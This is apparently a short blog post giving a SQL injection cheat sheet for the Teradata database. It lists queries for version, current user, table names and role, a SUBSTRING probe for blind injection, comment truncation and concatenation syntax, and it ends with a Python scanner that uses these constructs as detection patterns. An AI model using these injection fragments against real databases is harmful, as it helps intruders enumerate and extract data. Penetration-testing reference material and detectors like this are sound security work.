Teradata SQLi Cheatsheet

Ba Yin Min
Apr 9, 2024

tl;dr — This is a SQL Injection cheat sheet for the Teradata database. This is still an initial version and not comprehensive enough yet.

So far, I have not come across a SQLi cheat sheet for Teradata, although there are excellent SQLi cheat sheets from sources such as PortSwigger and Pentest Monkey (the classic one, thanks!). In collaboration with Buckdover, we came up with a cheat sheet for Teradata to aid penetration testers and security researchers in finding vulnerabilities, in an effort to ramp up the application security posture for their customers and clients.

Version

SELECT InfoData FROM dbc.dbcinfo WHERE InfoKey = 'Version'

Database

SELECT DATABASE

Current User

SELECT USER

Substring

SUBSTRING(<select statement>, 1, 1) = 'A'

Comments

To comment out the rest of a statement, use two dashes.

--comment

String Concatenation

You can concatenate multiple strings by using either the double pipe operator (||) or the CONCAT() function.

'S'||CONCAT('AMPLE','E')

Table Names

SELECT TableName FROM DBC.TablesV

Limit/Order By

SAMPLE 3

TOP 3

Current Role

SELECT RoleName FROM dbc.RolesV WHERE RoleName = CURRENT_ROLE

Additional Notes

  • SEL can be used instead of SELECT.
  • There is no direct sleep/wait function unless you are able to create stored procedures.
  • A delay could be created with an expensive query, but it may not give consistent results.
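
For defenders, the constructs above double as detection signatures. The following is an added example, not part of the original cheat sheet: a small Python scanner that flags decoded request-parameter values containing the Teradata constructs listed here, and shows why a signature keyed only on SELECT misses the SEL abbreviation. The rule names, the strong/weak split and the sample values are assumptions made for illustration.

```python
import re

# Added example. Rule names and the strong/weak split are assumptions;
# the matched constructs are the ones listed in this cheat sheet.
SEL = r"\bSEL(?:ECT)?\b"  # Teradata accepts SEL as an abbreviation of SELECT
RULES = {
    "dbc_dictionary_view": re.compile(r"\bdbc\s*\.\s*(dbcinfo|tablesv|rolesv)\b", re.I),
    "substring_probe": re.compile(r"\bSUBSTRING\s*\(\s*\(?\s*" + SEL, re.I),
    "current_role": re.compile(r"\bCURRENT_ROLE\b", re.I),
    "select_session_value": re.compile(SEL + r"\s+(DATABASE|USER)\b", re.I),
    "row_limit": re.compile(r"\b(SAMPLE|TOP)\s+\d+\b", re.I),
    "trailing_comment": re.compile(r"--[^\r\n]*$"),
    "concat_operator": re.compile(r"'\s*\|\|\s*(?:'|CONCAT\s*\()", re.I),
}
# Strong rules rarely appear in ordinary user input; weak rules often do,
# so a weak rule only counts when at least two of them fire together.
STRONG = {"dbc_dictionary_view", "substring_probe", "current_role"}
# A typical keyword-only signature, kept here to show what it misses.
NAIVE_SELECT = re.compile(r"\bSELECT\b", re.I)


def scan(value):
    """Return (flagged, sorted rule names) for one decoded parameter value."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(value))
    flagged = any(h in STRONG for h in hits) or len(hits) >= 2
    return flagged, hits


# Constructed sample parameter values (not captured traffic).
SAMPLES = [
    "SUBSTRING((SEL InfoData FROM dbc.dbcinfo WHERE InfoKey = 'Version'), 1, 1) = 'A'",
    "SEL TableName FROM DBC.TablesV SAMPLE 3 --comment",
    "Please select user from the list",
    "top 10 laptops",
]

if __name__ == "__main__":
    for s in SAMPLES:
        flagged, hits = scan(s)
        naive = bool(NAIVE_SELECT.search(s))
        print(f"{'FLAG' if flagged else 'ok':4} naive_select={naive} {hits} <- {s!r}")
```

The first two samples are flagged even though neither contains the word SELECT, which is the case a keyword-only rule lets through.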
